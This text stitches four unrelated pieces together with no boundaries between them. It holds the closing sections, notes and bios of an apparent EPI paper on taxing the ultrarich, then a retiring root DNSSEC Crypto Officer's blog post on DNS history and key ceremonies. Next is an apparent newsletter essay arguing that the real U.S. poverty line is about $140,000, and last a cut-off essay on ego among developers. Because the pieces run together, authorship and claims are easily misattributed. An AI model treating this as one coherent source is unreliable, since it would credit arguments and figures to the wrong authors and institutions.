For those like us who advocate for even larger expansions of the U.S. system of income support, social insurance, and public investment, the future political debate over how to finance them would be on much more favorable ground with the public’s support. The conditions of the debate would change if the public could shake the (too often true) impression that the U.S. government is failing to ask the ultrarich and corporations to do their part to contribute to the nation’s fiscal needs.
Conclusion
Obviously, this program of laser-targeting tax increases on the ultrarich is not the policy of the current Trump administration or the Republican majority in Congress. They have already spent the first half of 2025 forcing through a monster of a reconciliation bill, which extended the expiring provisions of the TCJA, provisions that provide disproportionate benefits to the very rich. The reconciliation bill represents a shocking upward redistribution of income from the very poor to the very rich, paying for trillions of dollars in tax cuts that primarily benefit the wealthy by stripping health care and food assistance from millions of Americans.
But as damaging as extending these expiring provisions will be to tax fairness and economic outcomes, they might be even more damaging to the public’s confidence that tax policy can ever be reoriented to ensure that the ultrarich and corporations pay their fair share. Instead, the debate over the expiring provisions will draw attention to two facts. First, the large majority of U.S. households will see a tax cut (relative to current law), but these cuts will be much larger for the rich. For example, the bottom 60% of households will see a tax cut of just over $1 per day, while the top 1% will see a cut of $165 per day, and the top 0.1% will see a whopping $860 per day. Second, these regressive tax cuts are bundled with spending cuts that will sharply reduce incomes for the people in the bottom half of the income distribution, leaving them net losers overall.
This combination of facts will continue to feed perceptions that the only way typical households can get something—anything—out of tax policy debates is if they settle for crumbs from the feast enjoyed by the richest. And even these crumbs will be taken back in the form of cuts elsewhere.
It’s time to reverse these perceptions. If policymakers engage in a confidence-building set of measures to raise significant revenue only from the ultrarich, the public’s stance toward tax policy can be changed from being anti-tax to being willing to have debates about the pros and cons of public sector expansions, content in the knowledge that the very rich will neither escape their obligations nor claim the lion’s share of benefits yet again.
Notes
1.
Obviously not all of this downward ratchet is bad. The steep decline in tax rates for the poorest families, driven by expanding Earned Income and Child Tax credits, has been a very welcome policy development in recent decades.
2.
The strong relationship between the level of gross domestic product (GDP) per capita and the share of the public sector in a nation’s economy is recognized enough to have been named: Wagner’s Law.
3.
On the relative smallness of the U.S. fiscal state (both spending and taxation as shares of GDP), see EPI 2025.
4.
Bivens and Mishel 2021 note the number of intentional policy changes outside the sphere of taxation that have driven much of the growth in pre-tax inequality.
5.
For example, both the Affordable Care Act (ACA) and the Inflation Reduction Act (IRA) paid for the additional spending on public investments and income support programs they called for with new taxes. That said, because Republican-driven tax cuts were passed in the interim, the upshot has been mostly larger budget deficits over time.
6.
See Kogan and Vela 2024 for an explanation and estimation of the U.S. fiscal gap in 2024.
7.
The rate of return assumption matters a lot for how durable revenue increases from a wealth tax will be over time. A rate of 8.5% is on the high end of many projections for rates of return to wealth in coming decades.
8.
Specifically, they note about wealth taxes: “Set the rates medium (2%–3%) and you get revenue for a long time and deconcentration eventually” (Saez and Zucman 2019b). When they estimate the potential revenue of Elizabeth Warren’s 2% wealth tax on estates over $50 million (with an additional tax of 1% on wealth over a billion), they find it raises roughly 1% of GDP per year (Saez and Zucman 2019a).
9.
This estimate comes from the Penn Wharton Budget Model 2022.
10.
For a description of that surtax and the competing revenue options debated at the time, see Bivens and Gould 2009.
11.
This number has been inflated to 2024 dollars.
12.
See Gardner et al. 2024 on the effective corporate income tax rate before and after the TCJA.
13.
For example, the Distributional Financial Accounts of the Federal Reserve Board (2025) estimate that the wealthiest 1% of households own over 30% of corporate equities, while the wealthiest 10% own just under 90%.
14.
See Sarin and Summers 2019 for how much of the tax gap is driven by poor reporting requirements on income flows disproportionately earned by the rich—mostly various forms of noncorporate business income.
15.
This range of estimates comes from the Joint Committee on Taxation (JCT) 2023, and Lautz and Hernandez 2024. Part of this variation is about how much extra revenue is allocated to the strict step-up in basis termination versus the extra revenue that is collected through the normal capital gains tax as a result of closing this loophole.
16.
The details of this gap can be found in Office of Tax Analysis 2016. The upshot is that some business owners have managed to deny being active managers of their firms and have, hence, avoided being taxed on labor earnings, but they have somehow also managed to deny being passive owners of their firms, hence avoiding the NIIT as well. It is bizarre that this not-active but not-passive category of owner has been allowed to be given legal status, but that does seem to be the state of the law currently, until Congress acts.
17.
See Bivens 2016 on how profits held abroad by deferring taxation were not a constraint on any meaningful economic activity.
18.
I say “appear” because the ability and even the specific strategies corporations have to make profits clearly earned by sales in the United States appear on paper to have been earned in tax havens are all extremely well documented by now, including in Zucman 2015.
19.
See Elzayn et al. 2023 for evidence that the audit patterns of the IRS in the mid-2010s were driven by these considerations.
Brun, Lidía, Ignacio González, and Juan Antonio Montecino. 2025. “
Corporate Taxation and Market Power Wealth
.” Working Paper, Institute for Macroeconomic Policy Analysis (IMPA), February 12, 2025.
Elazyn, Hadi, Evelyn Smith, Thomas Hertz, Arun Ramesh, Robin Fisher, Daniel E. Ho, and Jacob Goldin. 2023. “
Measuring and Mitigating Racial Disparities in Tax Audits
.” Stanford Institute for Economic Policy Research (SIEPR) Working Paper, January 2023.
Hemel, Daniel, and Robert Lord. 2021. “
Closing Gaps in the Estate and Gift Tax Base
.” Working Paper, Coase-Sandor Working Paper Series in Law and Economics. University of Chicago Law School, August 13, 2021.
Josh Bivens is the chief economist at the Economic Policy Institute (EPI). His areas of research include macroeconomics, inequality, social insurance, public investment, and the economics of globalization.
Bivens has written extensively for both professional and public audiences, with his work appearing in peer-reviewed academic journals (like the Journal of Economic Perspectives) and edited volumes (like The Handbook of the Political Economy of Financial Crises from Oxford University Press), as well as in popular print outlets (like USA Today, the Wall Street Journal and the New York Times).
Bivens is the author of Failure by Design: The Story behind America’s Broken Economy (EPI and Cornell University Press) and Everybody Wins Except for Most of Us: What Economics Really Teaches About Globalization (EPI), and is a co-author of The State of Working America, 12th Edition (EPI and Cornell University Press).
Bivens has provided expert insight to a range of institutions and media, including formally testifying numerous times before committees of the U.S. Congress.
Before coming to EPI, he was an assistant professor of economics at Roosevelt University. He has a Ph.D. in economics from the New School for Social Research and a bachelor’s degree from the University of Maryland at College Park.
The Economic Policy Institute’s vision is an economy that is just and strong, sustainable, and equitable — where every job is good, every worker can join a union, and every family and community can thrive.
About EPI. The Economic Policy Institute (EPI) is a nonprofit, nonpartisan think tank working for the last 30 years to counter rising inequality, low wages and weak benefits for working people, slower economic growth, unacceptable employment conditions, and a widening racial wage gap. We intentionally center low- and middle-income working families in economic policy discussions at the federal, state, and local levels as we fight for a world where every worker has access to a good job with fair pay, affordable health care, retirement security, and a union.
We also know that research on its own is not enough—that’s why we intentionally pair our research with effective outreach and advocacy efforts as we fight to make concrete change in everyday people’s lives.
The Economic Policy Institute’s vision is for all workers to share equally in the economic prosperity of our country. Our research exposes the forces that seek to exclude and diminish the power of people of color and women—particularly Black, Brown, and indigenous people—to the benefit of white supremacy and wealthy elites. We recognize the economic legacy of anti-Blackness; slavery; colonialization; oppressive policies, practices, and institutions; and the persistence of structural racism, sexism, and xenophobia today. Therefore, our vision elevates the importance of racial, gender, and worker justice as central to the world we want to see.
Passing the Torch – My Last Root DNSSEC KSK Ceremony as Crypto Officer 4
Many years ago, when I was but an infant, the first computers were
connected on the
ARPANET
-
the seminal computer network that would eventually evolve to become
the Internet. Computers at the time were large and expensive; indeed
the first version of
NCP
- the predecessor of TCP/IP - only countenanced roughly 250 computers
on the network.
The name (human friendly) to network address (computer friendly)
mapping on this network was maintained via a "hosts file" - literally
a flat file of ordered pairs, creating the connection between host
(computer) name and address.
So it continued as computers got less expensive and proliferated, the
Network Effect
caused
more institutions to want to be connected to the ARPANET. TCP/IP was
developed in response to this, with support for orders of magnitude
more connected computers. Along the way, the military users of the
network got carved off into its own network, and by the early 1980s we
had the beginnings of the Internet, or a "catenet" as it was sometimes
called at the time - a network of networks.
Clearly, as we went from "a couple hundred computers" to "capacity for
billions", a centrally managed host file wasn't going to scale, and by
the early 1980s development had started on a distributed database to
replace the centrally managed file. The name for this distributed
database was the Domain Name System, or DNS.
It's important to realize that at the time, access to the network of
networks was still restricted to a chosen few - higher education,
research institutions, military organizations and the
military-industrial complex (ARPA, later DARPA, was, after all, an
activity of the United States Department of Defense), and a few
companies that were tightly associated with one or more of those
constituencies. Broad public commercial access to the Internet was
many years in the future.
It was in this environment that the DNS sprang forth. Academics,
military researchers, university students - a pretty collegial
environment. Not to mention paleo-cybersecurity practices - indeed
the word "cybersecurity" may not have even been coined yet, though the
notion of "computer security" dates back to the early 1970s.
I've mentioned this brief "history of the early Internet" to
preemptively answer the question which inevitably arises: why didn't
DNS have better security built in? The answer is twofold: firstly it
didn't have to based on the environment that it evolved in, and
secondly, even if it had, the security practices would have been
firmly rooted in 1980s best practices, which would certainly be
inadequate by modern standards.
Discovery of security flaws in 1990 led the IETF to begin development
on Domain Name System Security Extensions (DNSSEC) in 1995. Early versions were
difficult to deploy. Later versions improved somewhat. But inertia is a thing, the
status quo tends to prevail, and there was very real concern that DNSSEC would be
a net reliability minus (security vs. availability can be a tricky circle to square), concentrate
power in undesirable ways, and result in other unforeseen negative effects.
At the end of the day, as it so often does, it took a crisis to get
the ball rolling for real. In 2008,
Dan
Kaminsky
discovered a
fundamental flaw in DNS, which simplified cache poisoning -
essentially making it possible for an attacker to misdirect users to
arbitrary web sites.
In less than two years, the DNS root would be cryptographically signed
- allowing those who wished to sign their domains as well to create a
cryptographic chain of trust authenticating their DNS lookups. This
is non-repudiation, not non-disclosure - DNS queries and responses
continued to happen in the clear. But this time, responses came back
with a digital signature, courtesy of DNSSEC.
David Huberman at ICANN did a splendid slide deck explaining
how it all works
.
Trust in a system requires more than technical correctness. It
involves trust in the execution of running the system itself. For
that reason ICANN decided that it would build a framework to
facilitate trust and transparency. Among other things it included:
Placing the cryptographic material in two highly secure sites, one near Washington DC and one in Los Angeles (geographic diversity)
Creating a multi-layered security regimen requiring several people to access the Key Management Facility
Storing cryptographic material in offline
HSMs
which utilize
Shamir's Secret Sharing
to require a quorum of at least 3 out of 7 Crypto Officers to be present in order to "wake them up"
Trusted Community Representatives with roles of Crypto Officer and Recovery Key Share Holder
Highly scripted (and therefore auditable) ceremonies surrounding handling the cryptographc material
Live streaming all events
Hosting External Witnesses from the community who have expressed interest in being present for a ceremony in person
When the call for volunteers to be Trusted Community Representatives
came out, I was no stranger to community involvement, having served
several years on the ARIN Advisory Council and done community work
(and later Board work) for NANOG. I was employed by a Top Level
Domain operator, and submitted my CV and expressed my interest.
That's how I found myself in Culpeper, Virginia in 2010 as Crypto Officer 4 at the
first ceremony for signing the DNSSEC Root. I had no idea that I would still be doing it fifteen years
later. I was the last of the original Crypto Officers for KMF-East, and the
second last overall - outlasted only by Subramanian "SM" Moonesamy, who is Crypto Officer 7 for KMF-West.
It's been an adventure. I've been a small participant in root key
rolls, put in a B-roll appearance on BBC Horizon (S53E13), become
friends with many of the people I served with, overseen ceremonies
remotely during the COVID lockdown, and witnessed an amazing pivot by
ICANN staff who managed to get new HSMs selected, tested, integrated,
and deployed on only 8 months' notice, a feat which I remain in awe
of.
I was an early advocate for improving trust in our process by
leveraging natural turnover and backfilling existing
TCRs with people selected from a broader set of qualified individuals
than just the fellowship of DNS protocol experts, operators, and
developers. I'm grateful that our voices were heard.
On November 13th 2025, I passed the torch to
Lodrina
Cherne
who is now
Crypto Officer 4 for KMF-East. Lodrina is a security researcher,
an educator with an emphasis on digital forensics, and works in
security engineering at a large cloud provider. I'm honored to have
her as my successor.
I've had several people reach out to me to ask what prompted me to
step back from the ICANN volunteer work. Those who were hoping for
some kind of salacious dirt or scandal were sorely disappointed -
quite the opposite, this is a huge success story and I'm pleased to
have been able to do my small part. A direct cut and paste from Slack
logs with one of them follows:
What led you to step back from ICANN?
Several things:
It was understood to be a 5 year commitment. I've been doing it for more than 15.
It was broadly agreed among the cohort many years ago (over a decade ago) that more people from more diverse backgrounds than just DNS-old-boy-network (which was the original group of TCRs) was a Good Thing.
Many people cycled out earlier; I was happy to let the folks for whom travel was more odious go first. But it's only practical and only really good for the system to cycle out a single TCR per ceremony.
COVID delayed this. Kaminsky's untimely death and subsequent replacement as a recovery key shareholder (RKSH) delayed this.
A further delay was the AEP Keyper HSM getting abruptly EOLed, and the transition to the Thales Luna HSMs. It went off without a hitch after being researched, developed, and executed in 8 months - a record which I stand in awe of and which is a true testament to the skill and commitment of the ICANN PTI team. ICANN expressed the desire for continuity among long-serving COs past that milestone; Frederico Neves (fellow original Crypto Officer) and I were willing to extend our stay for that.
So in short it was time to pass the torch. Everyone has been doing
everything right. I remarked at the end of the Ceremony 59 that when we
started doing this 15 years ago, success was not guaranteed; it took
the Kaminsky bug to get us over the line to actually deploy it.
Today, the major Unix DNS resolvers ship with DNSSEC validation
enabled. All of the major public DNS resolvers (google, quad9,
cloudflare) do DNSSEC validation. I thanked everyone who has been
responsible for and put their personal credibility on the line for the
security, integrity, and credibility of this process and stated that I
was honored to have been able to play a small part in doing that.
Epilogue:
I won't be participating in most East Coast ceremonies from here on out, but I don't rule out occasionally showing up as an external witness, particularly at KMF-West where I have never visited in person.
Here scans of our ceremony scripts from both Ceremony 59 and the previous day's administrative ceremonies.
We’re going to largely skip markets again, because the sweater is rapidly unraveling in other areas as I pull on threads. Suffice it to say that the market is LARGELY unfolding as I had expected — credit stress is rising, particularly in the tech sector. Many are now pointing to the rising CDS for Oracle as the deterioration in “AI” balance sheets accelerates. CDS was also JUST introduced for META — it traded at 56, slightly worse than the aggregate IG CDS at 54.5 (itself up from 46 since I began discussing this topic):
Correlations are spiking as MOST stocks move in the same direction each day even as megacap tech continues to define the market aggregates:
Market pricing of correlation is beginning to pick up… remember this is the “real” fear index and the moving averages are trending upwards:
And, as I predicted, inflation concerns, notably absent from any market-based indication, are again freezing the Fed. The pilots are frozen, understanding that they are in Zugzwang — every choice has unfavorable options.
And so now, let’s tug on that loose thread… I’m sure many of my left-leaning readers will say, “This is obvious, we have been talking about it for YEARS!” Yes, many of you have; but you were using language of emotion (“Pay a living wage!”) rather than showing the math. My bad for not paying closer attention; your bad for not showing your work or coming up with workable solutions. Let’s rectify it rather than cast blame.
I have spent my career distrusting the obvious.
Markets, liquidity, factor models—none of these ever felt self-evident to me. Markets are mechanisms of price clearing. Mechanisms have parameters. Parameters distort outcomes. This is the lens through which I learned to see everything: find the parameter, find the distortion, find the opportunity.
But there was one number I had somehow never interrogated. One number that I simply accepted, the way a child accepts gravity.
The poverty line.
I don’t know why. It seemed apolitical, an actuarial fact calculated by serious people in government offices. A line someone else drew decades ago that we use to define who is “poor,” who is “middle class,” and who deserves help. It was infrastructure—invisible, unquestioned, foundational.
This week, while trying to understand why the American middle class feels poorer each year despite healthy GDP growth and low unemployment, I came across a sentence buried in a research paper:
“The U.S. poverty line is calculated as three times the cost of a minimum food diet in 1963, adjusted for inflation.”
I read it again. Three times the minimum food budget.
I felt sick.
The formula was developed by Mollie Orshansky, an economist at the Social Security Administration. In 1963, she observed that families spent roughly one-third of their income on groceries. Since pricing data was hard to come by for many items, e.g. housing, if you could calculate a minimum adequate food budget at the grocery store, you could multiply by three and establish a poverty line.
Orshansky was careful about what she was measuring. In her January 1965 article, she presented the poverty thresholds as a measure of income
inadequacy
, not income adequacy—”if it is not possible to state unequivocally ‘how much is enough,’ it should be possible to assert with confidence how much, on average, is too little.”
She was drawing a floor. A line below which families were clearly in crisis.
For 1963, that floor made sense. Housing was relatively cheap. A family could rent a decent apartment or buy a home on a single income, as we’ve discussed. Healthcare was provided by employers and cost relatively little (Blue Cross coverage averaged $10/month). Childcare didn’t really exist as a market—mothers stayed home, family helped, or neighbors (who likely had someone home) watched each other’s kids. Cars were affordable, if prone to breakdowns. With few luxury frills, the neighborhood kids in vo-tech could fix most problems when they did. College tuition could be covered with a summer job. Retirement meant a pension income, not a pile of 401(k) assets you had to fund yourself.
Orshansky’s food-times-three formula was crude, but as a
crisis
threshold—a measure of “too little”—it roughly corresponded to reality. A family spending one-third of its income on food would spend the other two-thirds on everything else, and those proportions more or less worked. Below that line, you were in genuine crisis. Above it, you had a fighting chance.
But everything changed between 1963 and 2024.
Housing costs exploded. Healthcare became the largest household expense for many families. Employer coverage shrank while deductibles grew. Childcare became a market, and that market became ruinously expensive. College went from affordable to crippling. Transportation costs rose as cities sprawled and public transit withered under government neglect.
The labor model shifted. A second income became mandatory to maintain the standard of living that one income formerly provided. But a second income meant childcare became mandatory, which meant two cars became mandatory. Or maybe you’d simply be “asking for a lot generationally speaking” because living near your parents helps to defray those childcare costs.
The composition of household spending transformed completely. In 2024, food-at-home is no longer 33% of household spending. For most families, it’s 5 to 7 percent.
Housing now consumes 35 to 45 percent. Healthcare takes 15 to 25 percent. Childcare, for families with young children, can eat 20 to 40 percent.
If you keep Orshansky’s logic—if you maintain her principle that poverty could be defined by the inverse of food’s budget share—but update the food share to reflect today’s reality, the multiplier is no longer three.
It becomes sixteen.
Which means if you measured income inadequacy today the way Orshansky measured it in 1963, the threshold for a family of four wouldn’t be $31,200.
It would be somewhere between $130,000 and $150,000.
And remember: Orshansky was only trying to define “too little.” She was identifying crisis, not sufficiency. If the crisis threshold—the floor below which families cannot function—is honestly updated to current spending patterns, it lands at $140,000.
What does that tell you about the $31,200 line we still use?
It tells you we are measuring starvation.
“An imbalance between rich and poor is the oldest and most fatal ailment of all republics.” — Plutarch
The official poverty line for a family of four in 2024 is $31,200. The median household income is roughly $80,000. We have been told, implicitly, that a family earning $80,000 is doing fine—safely above poverty, solidly middle class, perhaps comfortable.
But if Orshansky’s crisis threshold were calculated today using her own methodology, that $80,000 family would be living in deep poverty.
I wanted to see what would happen if I ignored the official stats and simply calculated the cost of existing. I built a Basic Needs budget for a family of four (two earners, two kids). No vacations, no Netflix, no luxury. Just the “Participation Tickets” required to hold a job and raise kids in 2024.
Using conservative, national-average data:
Childcare: $32,773
Housing: $23,267
Food: $14,717
Transportation: $14,828
Healthcare: $10,567
Other essentials: $21,857
Required net income: $118,009
Add federal, state, and FICA taxes of roughly $18,500, and you arrive at a required gross income of $136,500.
This is Orshansky’s “too little” threshold, updated honestly. This is the floor.
The single largest line item isn’t housing. It’s childcare: $32,773.
This is the trap. To reach the median household income of $80,000, most families require two earners. But the moment you add the second earner to chase that income, you trigger the childcare expense.
If one parent stays home, the income drops to $40,000 or $50,000—well below what’s needed to survive. If both parents work to hit $100,000, they hand over $32,000 to a daycare center.
The second earner isn’t working for a vacation or a boat. The second earner is working to pay the stranger watching their children so they can go to work and clear $1-2K extra a month. It’s a closed loop.
Critics will immediately argue that I’m cherry-picking expensive cities. They will say $136,500 is a number for San Francisco or Manhattan, not “Real America.”
So let’s look at “Real America.”
The model above allocates $23,267 per year for housing. That breaks down to $1,938 per month. This is the number that serious economists use to tell you that you’re doing fine.
In my last piece,
Are You An American?
, I analyzed a modest “starter home” which turned out to be in Caldwell, New Jersey—the kind of place a Teamster could afford in 1955. I went to Zillow to see what it costs to live in that same town if you don’t have a down payment and are forced to rent.
There are exactly seven 2-bedroom+ units available in the entire town. The cheapest one rents for $2,715 per month.
That’s a $777 monthly gap between the model and reality. That’s $9,300 a year in post-tax money. To cover that gap, you need to earn an additional $12,000 to $13,000 in gross salary.
So when I say the real poverty line is $140,000, I’m being conservative. I’m using optimistic, national-average housing assumptions. If we plug in the actual cost of living in the zip codes where the jobs are—where rent is $2,700, not $1,900—the threshold pushes past $160,000.
The market isn’t just expensive; it’s broken. Seven units available in a town of thousands? That isn’t a market. That’s a shortage masquerading as an auction.
And that $2,715 rent check buys you zero equity. In the 1950s, the monthly housing cost was a forced savings account that built generational wealth. Today, it’s a subscription fee for a roof. You are paying a premium to stand still.
Economists will look at my $140,000 figure and scream about “hedonic adjustments.” Heck, I will scream at you about them. They are valid attempts to measure the improvement in quality that we honestly value.
I will tell you that comparing 1955 to 2024 is unfair because cars today have airbags, homes have air conditioning, and phones are supercomputers. I will argue that because the quality of the good improved, the real price dropped.
And I would be making a category error. We are not calculating the price of luxury. We are calculating the price of participation.
To function in 1955 society—to have a job, call a doctor, and be a citizen—you needed a telephone line. That “Participation Ticket” cost $5 a month.
Adjusted for standard inflation, that $5 should be $58 today.
But you cannot run a household in 2024 on a $58 landline. To function today—to factor authenticate your bank account, to answer work emails, to check your child’s school portal (which is now digital-only)—you need a smartphone plan and home broadband.
The cost of that “Participation Ticket” for a family of four is not $58. It’s $200 a month.
The economists say, “But look at the computing power you get!”
I say, “Look at the computing power I
need
!”
The utility I’m buying is “connection to the economy.” The price of that utility didn’t just keep pace with inflation; it tripled relative to it.
I ran this “Participation Audit” across the entire 1955 budget. I didn’t ask “is the car better?” I asked “what does it cost to get to work?”
Healthcare: In 1955, Blue Cross family coverage was roughly $10/month ($115 in today’s dollars). Today, the average family premium is over $1,600/month. That’s 14x inflation.
Taxes (FICA): In 1955, the Social Security tax was 2.0% on the first $4,200 of income. The maximum annual contribution was $84. Adjusted for inflation, that’s about $960 a year. Today, a family earning the median $80,000 pays over $6,100. That’s 6x inflation.
Childcare: In 1955, this cost was zero because the economy supported a single-earner model. Today, it’s $32,000. That’s an infinite increase in the cost of participation.
The only thing that actually tracked official CPI was… food. Everything else—the inescapable fees required to hold a job, stay healthy, and raise children—inflated at multiples of the official rate when considered on a participation basis. YES, these goods and services are BETTER. I would not trade my 65” 4K TV mounted flat on the wall for a 25” CRT dominating my living room; but I don’t have a choice, either.
Once I established that $136,500 is the real break-even point, I ran the numbers on what happens to a family climbing the ladder toward that number.
What I found explains the “vibes” of the economy better than any CPI print.
Our entire safety net is designed to catch people at the very bottom, but it sets a trap for anyone trying to climb out. As income rises from $40,000 to $100,000, benefits disappear faster than wages increase.
I call this The Valley of Death.
Let’s look at the transition for a family in New Jersey:
1. The View from $35,000 (The “Official” Poor)
At this income, the family is struggling, but the state provides a floor. They qualify for Medicaid (free healthcare). They receive SNAP (food stamps). They receive heavy childcare subsidies. Their deficits are real, but capped.
2. The Cliff at $45,000 (The Healthcare Trap)
The family earns a $10,000 raise. Good news? No. At this level, the parents lose Medicaid eligibility. Suddenly, they must pay premiums and deductibles.
Income Gain: +$10,000
Expense Increase: +$10,567
Net Result: They are poorer than before. The effective tax on this mobility is over 100%.
3. The Cliff at $65,000 (The Childcare Trap)
This is the breaker. The family works harder. They get promoted to $65,000. They are now solidly “Working Class.”
But at roughly this level, childcare subsidies vanish. They must now pay the full market rate for daycare.
Income Gain: +$20,000 (from $45k)
Expense Increase: +$28,000 (jumping from co-pays to full tuition)
Net Result: Total collapse.
When you run the net-income numbers, a family earning $100,000 is effectively in a worse monthly financial position than a family earning $40,000.
At $40,000, you are drowning, but the state gives you a life vest. At $100,000, you are drowning, but the state says you are a “high earner” and ties an anchor to your ankle called “Market Price.”
In option terms, the government has sold a call option to the poor, but they’ve rigged the gamma. As you move “closer to the money” (self-sufficiency), the delta collapses. For every dollar of effort you put in, the system confiscates 70 to 100 cents.
No rational trader would take that trade. Yet we wonder why labor force participation lags. It’s not a mystery. It’s math.
The most dangerous lie of modern economics is “Mean Reversion.” Economists assume that if a family falls into debt or bankruptcy, they can simply save their way back to the average.
They are confusing Volatility with Ruin.
Falling below the line isn’t like cooling water; it’s like freezing it. It is a Phase Change.
When a family hits the barrier—eviction, bankruptcy, or default—they don’t just have “less money.” They become Economically Inert.
They are barred from the credit system (often for 7–10 years).
They are barred from the prime rental market (landlord screens).
They are barred from employment in sensitive sectors.
In physics, it takes massive “Latent Heat” to turn ice back into water. In economics, the energy required to reverse a bankruptcy is exponentially higher than the energy required to pay a bill.
The $140,000 line matters because it is the buffer against this Phase Change. If you are earning $80,000 with $79,000 in fixed costs, you are not stable. You are super-cooled water. One shock—a transmission failure, a broken arm—and you freeze instantly.
If you need proof that the cost of participating, the cost of
working,
is the primary driver of this fragility, look at the Covid lockdowns.
In April 2020, the US personal savings rate hit a historic 33%. Economists attributed this to stimulus checks. But the math tells a different story.
During lockdown, the “Valley of Death” was temporarily filled.
Childcare ($32k): Suspended. Kids were home.
Commuting ($15k): Suspended.
Work Lunches/Clothes ($5k): Suspended.
For a median family, the “Cost of Participation” in the economy is roughly $50,000 a year. When the economy stopped, that tax was repealed. Families earning $80,000 suddenly felt rich—not because they earned more, but because the leak in the bucket was plugged. For many, income actually rose thanks to the $600/week unemployment boost. But even for those whose income stayed flat, they felt rich because many costs were avoided.
When the world reopened, the costs returned, but now inflated by 20%. The rage we feel today is the hangover from that brief moment where the American Option was momentarily back in the money. Those with formal training in economics have dismissed these concerns, by and large. “Inflation” is the rate of change in the price level; these poor, deluded souls were outraged at the price LEVEL. Tut, tut… can’t have deflation now, can we? We promise you will like THAT even less.
But the price level does mean something, too. If you are below the ACTUAL poverty line, you are suffering constant deprivation; and a higher price level means you get even less in aggregate.
You load sixteen tons, what do you get?
Another day older and deeper in debt
Saint Peter, don’t you call me, ‘cause I can’t go
I owe my soul to the company store — Merle Travis, 1946
This mathematical valley explains the rage we see in the American electorate, specifically the animosity the “working poor” (the middle class) feel toward the “actual poor” and immigrants.
Economists and politicians look at this anger and call it racism, or lack of empathy. They are missing the mechanism.
Altruism is a function of surplus. It is easy to be charitable when you have excess capacity. It is impossible to be charitable when you are fighting for the last bruised banana.
The family earning $65,000—the family that just lost their subsidies and is paying $32,000 for daycare and $12,000 for healthcare deductibles—is hyper-aware of the family earning $30,000 and getting subsidized food, rent, childcare, and healthcare.
They see the neighbor at the grocery store using an EBT card while they put items back on the shelf. They see the immigrant family receiving emergency housing support while they face eviction.
They are not seeing “poverty.” They are seeing people getting for free the exact things that they are working 60 hours a week to barely afford. And even worse, even if THEY don’t see these things first hand… they are being shown them:
The anger isn’t about the goods. It’s about the breach of contract. The American Deal was that Effort ~ Security. Effort brought your Hope strike closer. But because the real poverty line is $140,000, effort no longer yields security or progress; it brings risk, exhaustion, and debt.
When you are drowning, and you see the lifeguard throw a life vest to the person treading water next to you—a person who isn’t swimming as hard as you are—you don’t feel happiness for them. You feel a homicidal rage at the lifeguard.
We have created a system where the only way to survive is to be destitute enough to qualify for aid, or rich enough to ignore the cost. Everyone in the middle is being cannibalized. The rich know this… and they are increasingly opting out of the shared spaces:
If you need visual proof of this benchmark error, look at the charts that economists love to share on social media to prove that “vibes” are wrong and the economy is great.
You’ve likely seen this chart. It shows that the American middle class is shrinking not because people are getting poorer, but because they’re “moving up” into the $150,000+ bracket.
The economists look at this and cheer. “Look!” they say. “In 1967, only 5% of families made over $150,000 (adjusted for inflation). Now, 34% do! We are a nation of rising aristocrats.”
But look at that chart through the lens of the real poverty line.
If the cost of basic self-sufficiency for a family of four—housing, childcare, healthcare, transportation—is $140,000, then that top light-blue tier isn’t “Upper Class.”
It’s the Survival Line.
This chart doesn’t show that 34% of Americans are rich. It shows that only 34% of Americans have managed to escape deprivation. It shows that the “Middle Class” (the dark blue section between $50,000 and $150,000)—roughly 45% of the country—is actually the Working Poor. These are the families earning enough to lose their benefits but not enough to pay for childcare and rent. They are the ones trapped in the Valley of Death.
But the commentary tells us something different:
“Americans earned more for several reasons. The first is that neoliberal economic policies
worked as intended
. In the last 50 years, there have been big increases in productivity, solid GDP growth and, since the 1980s, low and predictable inflation. All this helped make most Americans richer.”
“
neoliberal economic policies
worked as intended
” —
read that again. With
POSIWID
(the purpose of a system is what it does) in mind.
The chart isn’t measuring prosperity. It’s measuring inflation in the non-discretionary basket. It tells us that to live a 1967 middle-class life in 2024, you need a “wealthy” income.
And then there’s this chart, the shield used by every defender of the status quo:
Poverty has collapsed to 11%. The policies worked as intended!
But remember Mollie Orshansky. This chart is measuring the percentage of Americans who cannot afford a minimum food diet multiplied by three.
It’s not measuring who can afford rent (which is up 4x relative to wages). It’s not measuring who can afford childcare (which is up infinite percent). It’s measuring starvation.
Of course the line is going down. We are an agricultural superpower who opened our markets to even cheaper foreign food. Shrimp from Vietnam, tilapia from… don’t ask. Food is cheap. But life is expensive.
When you see these charts, don’t let them gaslight you. They are using broken rulers to measure a broken house. The top chart proves that you need $150,000 to make it. The bottom chart proves they refuse to admit it.
So that’s the trap. The real poverty line—the threshold where a family can afford housing, healthcare, childcare, and transportation without relying on means-tested benefits—isn’t $31,200.
It’s ~$140,000.
Most of my readers will have cleared this threshold. My parents never really did, but I was born lucky — brains, beauty (in the eye of the beholder admittedly), height (it really does help), parents that encouraged and sacrificed for education (even as the stress of those sacrifices eventually drove my mother clinically insane), and an American citizenship. But most of my readers are now seeing this trap for their children.
And the system is designed to prevent them from escaping. Every dollar you earn climbing from $40,000 to $100,000 triggers benefit losses that exceed your income gains. You are literally poorer for working harder.
The economists will tell you this is fine because you’re building wealth. Your 401(k) is growing. Your home equity is rising. You’re richer than you feel.
Next week, I’ll show you why that’s wrong. And THEN we can’t start the discussion of how to rebuild. Because we can.
The wealth you’re counting on—the retirement accounts, the home equity, the “nest egg” that’s supposed to make this all worthwhile—is just as fake as the poverty line. But the humans behind that wealth are real. And they are amazing.
A Unified Theory of Ego, Empathy, and Humility at Work
In our daily lives empathy and humility are obvious virtues we aspire to. They keep our egos in check. Less obvious is that they’re practical skills in the workplace, too. I think, for developers and technical leaders in particular, that the absence of ego is the best way to further our careers and do great work.
In
the simplest of terms
the ego is the characteristic of personhood that enables us to practice self-reflection, self-awareness, and accountability for the actions or decisions we take.
However, the ego also motivates us to reframe our perception of the world in whatever way keeps us centered in it. Each of us is perpetually driven to justify our place in the world. This
constant self-justification
is like an engine that idles for our entire lives, and it requires constant fine-tuning. When it runs amok this is what we call a “big” ego.
Breaking News! Developers Have Egos!
I’m not thinking only of the 10x engineer stereotype, although I’ve worked with such folks in the past. Ego is more nuanced than that. Besides the most arrogant developer in the room throwing their weight around, our egos manifest in hundreds of ways that are much harder to detect.
As developers we’re more susceptible to letting our egos run free. The nature of our work is so technical that to others it can seem obscure, arcane, or even magical. Sometimes we don’t do enough to actively dispel that notion—and just like that half the work of self-justification is already done for us.
Very often it’s not intentional. The simplest example is the overuse of jargon and acronyms. We all do it, but as
Jeremy Keith explains
:
